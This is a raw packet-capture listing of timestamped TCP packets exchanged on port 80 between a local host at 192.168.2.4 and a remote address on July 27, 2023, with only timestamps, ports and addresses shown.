Jul 27, 2023 20:19:06.745883942 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.745882034 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.745882034 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.745882034 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.745929003 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.745960951 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.745973110 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.745978117 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.746016979 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.746059895 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.746076107 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.746104956 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.746162891 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.746166945 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.746222019 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.746233940 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.746285915 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.746330976 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.746376038 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.746378899 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.746407032 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.746418953 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.746429920 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.746465921 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.746500015 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.746512890 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.746546030 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.746589899 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.746608019 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.746634960 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.746638060 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.746663094 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.746681929 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.746728897 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.746753931 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.746773005 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.746818066 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.746862888 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.746889114 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.746889114 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.746907949 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.746922970 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.746953964 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.746975899 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.747042894 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.747045994 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.747091055 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.747108936 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.747133970 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.747176886 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.747220993 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.747225046 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.747246027 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.747288942 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.747344971 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.747360945 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.747389078 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.747431993 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.747446060 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.747477055 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.747494936 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.747519970 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.747564077 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.747582912 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.747606993 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.747654915 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.747667074 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.747699022 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.747744083 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.747786999 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.747786999 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.747787952 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.747831106 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.747853041 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.747874022 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.747900009 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.747919083 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.747927904 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.747963905 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.747975111 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.748011112 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.748020887 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.748055935 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.748073101 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.748100042 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.748117924 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.748143911 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.748147964 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.748188019 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.748199940 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.748231888 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.748246908 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.748310089 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.748327017 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.748372078 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.748406887 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.748415947 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.748461962 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.748460054 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.748462915 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.748507977 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.748526096 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.748553991 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.748594999 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.748600006 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.748624086 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.748642921 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.748680115 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.748691082 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.748703003 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.748737097 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.748785973 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.748831034 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.748845100 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.748868942 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.748877048 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.748899937 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.748922110 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.748928070 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.748969078 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.748995066 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.749013901 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.749037981 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.749059916 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.749080896 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.749105930 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.749113083 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.749151945 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.749161005 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.749197960 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.749205112 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.749243975 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.749289989 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.749298096 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.749298096 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.749335051 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.749353886 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.749382019 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.749403954 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.749434948 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.749445915 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.749497890 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.749507904 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.749543905 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.749567032 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.749589920 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.749603987 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.749638081 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.749672890 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.749685049 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.749708891 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.749732971 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.749773026 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.749778032 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.749800920 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.749821901 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.749866009 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.749867916 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.749901056 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.749908924 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.749922037 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.749954939 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.749995947 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.750045061 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.750065088 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.750092030 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.750134945 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.750138998 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.750179052 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.750268936 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.750304937 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.750304937 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.750304937 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.750313997 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.750359058 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.750370979 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.750370979 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.750405073 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.750418901 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.750451088 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.750458956 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.750510931 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.750534058 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.750579119 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.750628948 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.750649929 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.750669003 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.750726938 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.015309095 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.015346050 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.015367031 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.015387058 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.015423059 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.015443087 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.015461922 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.015481949 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.015502930 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.015516043 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.015528917 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.015482903 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.015542984 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.015557051 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.015577078 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.015584946 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.015584946 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.015613079 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.015634060 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.015657902 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.015676022 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.015677929 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.015676975 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.015676975 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.015697956 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.015717983 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.015754938 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.015757084 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.015757084 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.015757084 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.015779018 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.015780926 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.015804052 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.015818119 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.015836000 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.015842915 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.015855074 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.015868902 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.015896082 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.015898943 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.015922070 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.015928030 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.015947104 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.015949965 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.015975952 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.015984058 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.015997887 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.016004086 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.016028881 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.016035080 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.016052008 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.016055107 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.016072989 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.016082048 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.016108990 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.016134024 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.016136885 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.016156912 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.016164064 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.016184092 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.016190052 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.016206026 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.016216993 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.016243935 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.016259909 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.016289949 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.016297102 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.016319036 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.016347885 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.016372919 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.016376019 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.016402960 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.016422987 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.016429901 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.016455889 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.016458035 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.016483068 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.016489983 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.016500950 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.016520977 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.016527891 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.016550064 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.016555071 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.016577005 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.016581059 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.016602993 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.016612053 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.016638994 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.016659021 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.016666889 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.016694069 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.016716003 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.016721010 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.016740084 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.016766071 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.016769886 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.016791105 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.016802073 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.016819000 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.016829967 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.016845942 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.016849995 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.016869068 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.016872883 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.016892910 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.016901016 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.016926050 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.016940117 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.016952038 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.016957998 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.016980886 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.016980886 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.016998053 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.017019987 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.017023087 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.017047882 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.017066956 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.017075062 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.017098904 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.017102003 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.017128944 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.017131090 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.017153025 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.017154932 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.017174006 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.017205000 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.017230034 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.017247915 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.017256021 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.017278910 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.017282963 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.017307043 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.017307997 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.017328024 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.017334938 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.017342091 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.017360926 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.017386913 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.017404079 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.017411947 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.017436028 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.017440081 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.017466068 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.017467976 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.017477989 CEST	49698	80	192.168.2.4	103.100.211.218
